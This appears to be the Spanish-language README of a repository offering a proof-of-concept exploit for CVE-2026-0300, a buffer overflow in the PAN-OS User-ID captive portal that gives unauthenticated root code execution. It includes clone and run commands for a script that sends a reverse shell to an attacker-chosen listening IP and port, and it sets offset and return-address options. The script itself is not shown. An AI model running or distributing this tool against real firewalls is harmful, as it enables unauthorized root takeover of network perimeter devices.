
Prueba de concepto para CVE-2026-0300, un desbordamiento de búfer crítico en el Portal User-ID de PAN-OS que permite la ejecución remota de código no autenticada con privilegios de root.
CVE-2026-0300 es una vulnerabilidad de desbordamiento de búfer de alta gravedad identificada en el Portal de Autenticación User-ID™ (Portal Cautivo) de Palo Alto Networks PAN-OS. Este repositorio de investigación demuestra la lógica técnica de la vulnerabilidad, centrándose específicamente en cómo un paquete de red no autenticado puede conducir a la Ejecución Remota de Código (RCE) con privilegios de root.
| Característica | Detalles |
|---|---|
| ID CVE | CVE-2026-0300 |
| Puntuación de Gravedad | 9.3 (Crítico) |
| Tipo de Debilidad | CWE-787: Escritura Fuera de Límites |
| Vector de Ataque | Red (No autenticado) |
| Privilegios Requeridos | Ninguno |
| Interacción del Usuario | Ninguna |
| Software Afectado | PAN-OS 12.1, 11.2, 11.1, 10.2 |
La vulnerabilidad ocurre cuando el servicio del Portal de Autenticación User-ID no valida la longitud de los datos entrantes antes de escribirlos en un búfer de memoria.
socket, struct y argparse estándar).git clone https://github.com/p3Nt3st3r-sTAr/CVE-2026-0300-POC.git
cd CVE-2026-0300-POC
chmod +x research_poc.py
Esta herramienta está diseñada con una CLI (Interfaz de Línea de Comandos) profesional.
python3 research_poc.py -t <TARGET_IP> --lhost <LISTEN_IP> -L <LISTEN_PORT>
| Indicador | Nombre | Descripción | Predeterminado |
|---|---|---|---|
| -t | --target | (Requerido) Dirección IP del firewall objetivo. | N/D |
| -p | --port | El puerto donde se ejecuta el Portal User-ID. | 6082 |
| -o | --offset | La longitud en bytes para alcanzar el punto de desbordamiento de memoria. | 2048 |
| -r | --ret | La dirección de retorno en hexadecimal. | 0xdeadbeef |
| -l | --lhost | Dirección IP de la shell inversa | Tu IP |
| -L | --lport | Tu puerto de escucha | 4444 |
SOLO PARA INVESTIGACIÓN EDUCATIVA Y AUTORIZADA. Las pruebas no autorizadas contra sistemas que no posees son ilegales. El autor no es responsable del mal uso de este código de investigación. Úsalo de manera responsable para mejorar la seguridad global. Desarrollado por: https://t.me/p3Nt3st3rsTAr Fecha de Descubrimiento de la Vulnerabilidad: 07 de mayo de 2026